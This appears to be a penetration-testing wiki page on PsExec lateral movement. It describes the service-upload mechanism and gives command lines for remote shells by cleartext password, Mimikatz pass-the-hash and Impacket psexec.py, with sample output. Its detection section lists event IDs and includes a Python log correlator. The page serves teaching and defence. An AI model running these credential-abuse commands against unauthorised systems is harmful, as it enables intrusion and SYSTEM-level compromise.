# PSExec

{% hint style="warning" %}
Administrator rights on the target machine are mandatory.
{% endhint %}

PsExec is part of the Sysinternals tool suite and has been reimplemented in the Impacket suite (which works almost the same way). The Sysinternals binary is Microsoft-signed, which makes it generally reliable in most Windows environments. It executes commands on a remote system by:

1. Connecting to the administrative share ADMIN$ (which maps to C:\Windows).
2. Uploading a PSEXESVC.exe file to that share.
3. Using the Service Control Manager (sc) to install and start the uploaded binary as a service running as NT AUTHORITY\SYSTEM (the Sysinternals PsExec service is named PSEXESVC by default, whereas Impacket's psexec.py spawns a process with a randomly generated 4-character name).
4. Creating a named pipe on the target and using it for I/O.
5. Running the requested program as a child of PSEXESVC.exe, whose own parent process is services.exe.
6. When the task completes, the PSEXESVC service is stopped and PSEXESVC.exe is deleted from ADMIN$.

In general, most defensive tools detect (or at least have the ability to detect) lateral movement via PsExec.

{% tabs %}
{% tab title="Cleartext password" %}

```powershell
psexec.exe /accepteula \\<IP> -u DOMAIN\USERNAME -p PASSWORD cmd.exe
```

{% endtab %}

{% tab title="NTLM Hash" %}
By default, PsExec does not support Pass-the-Hash. However, Mimikatz can be used to perform a Pass-the-Hash attack, and PsExec is then run from the resulting command prompt:

```powershell
# Open a command prompt in the context of the user's NTLM hash using Mimikatz:
mimikatz > sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<HASH_NTLM>

# Run PsExec from the spawned command prompt:
PsExec.exe /accepteula \\<IP> cmd.exe
```

{% endtab %}

{% tab title="Impacket PSExec" %}

```
$ psexec.py Administrator:<PASSWORD>@10.10.0.4 -debug
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[+] StringBinding ncacn_np:10.10.0.4[\pipe\svcctl]
[*] Requesting shares on 10.10.0.4.....
[*] Found writable share ADMIN$
[*] Uploading file BXtvAhde.exe
[*] Opening SVCManager on 10.10.0.4.....
[*] Creating service IcsJ on 10.10.0.4.....
[*] Starting service IcsJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1935]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
```

{% endtab %}
{% endtabs %}

## Detection

Because PSEXESVC.exe is uploaded to the target's administrative share (ADMIN$), it is possible to correlate the following events:

1. File creation on the share.
2. Installation of a service.
3. Start of a process.

Logs:

* `Id 5145` (Security log): a network share object was checked to see whether the client can be granted the desired access; recorded when ADMIN$ is accessed.
* `Id 7045` (System log): a service was installed on the system; recorded for the initial installation of the service.
* `Id 4697` (Security log): a service was installed on the system.
* The existence of a PSEXESVC.exe file is an indication that PsExec was used to gain access to the target machine.
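As an added example (not from the original page), the small Python correlator below runs over constructed event records shaped like the 5145 / 7045 / 4697 entries listed above, once parsed into dicts whose keys follow the Windows EventData field names. It flags a host where an `.exe` written to ADMIN$ is followed shortly afterwards by a service whose binary has the same file name, which covers both the Sysinternals PSEXESVC name and Impacket's random names; the sample data, hostnames and time window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (field names follow Windows EventData); not real logs.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "host": "WS01", "id": 5145, "ShareName": "\\\\*\\Data",
     "RelativeTargetName": "report.docx", "AccessMask": "0x2"},
    {"time": "2024-01-01T10:00:05", "host": "WS01", "id": 5145, "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "BXtvAhde.exe", "AccessMask": "0x2"},
    {"time": "2024-01-01T10:00:06", "host": "WS01", "id": 7045, "ServiceName": "IcsJ",
     "ImagePath": "%SystemRoot%\\BXtvAhde.exe"},
    {"time": "2024-01-01T11:30:00", "host": "SRV02", "id": 5145, "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "PSEXESVC.exe", "AccessMask": "0x2"},
    {"time": "2024-01-01T11:30:01", "host": "SRV02", "id": 4697, "ServiceName": "PSEXESVC",
     "ServiceFileName": "%SystemRoot%\\PSEXESVC.exe"},
    {"time": "2024-01-01T12:00:00", "host": "SRV02", "id": 7045, "ServiceName": "Backup",
     "ImagePath": "C:\\Program Files\\Backup\\svc.exe"},
]

WRITE_DATA = 0x2  # AccessMask bit meaning WriteData / AddFile in a 5145 event

def _service_binary(event):
    """Basename of the service binary from a 7045 (ImagePath) or 4697 (ServiceFileName) event."""
    path = event.get("ImagePath") or event.get("ServiceFileName") or ""
    return path.replace("/", "\\").split("\\")[-1].strip('"').lower()

def detect_psexec(events, window=timedelta(minutes=2)):
    """Flag hosts where an .exe written to ADMIN$ is followed within `window` by a
    service install whose binary has the same file name. Returns (host, service, binary)."""
    uploads = []  # (host, time, filename) taken from qualifying 5145 events
    hits = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 5145:
            name = e.get("RelativeTargetName", "").lower()
            if (e.get("ShareName", "").upper().endswith("ADMIN$") and name.endswith(".exe")
                    and int(e.get("AccessMask", "0"), 16) & WRITE_DATA):
                uploads.append((e["host"], t, name))
        elif e["id"] in (7045, 4697):
            binary = _service_binary(e)
            for host, t0, name in uploads:
                if host == e["host"] and name == binary and t - t0 <= window:
                    hits.append((host, e["ServiceName"], binary))
                    break
    return hits

if __name__ == "__main__":
    for host, svc, binary in detect_psexec(SAMPLE_EVENTS):
        print(f"[!] {host}: service {svc} runs {binary}, which was just written to ADMIN$")
```

The benign share write on WS01 and the later Backup service on SRV02 produce no hit, because neither pairs an executable written to ADMIN$ with a service pointing at that same file.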

{% hint style="danger" %}
`psexec_psh`, used by Cobalt Strike, does not copy a binary to the target but executes a single-line PowerShell command (always 32-bit).
{% endhint %}

### Reference(s)

{% embed url="https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/" %}
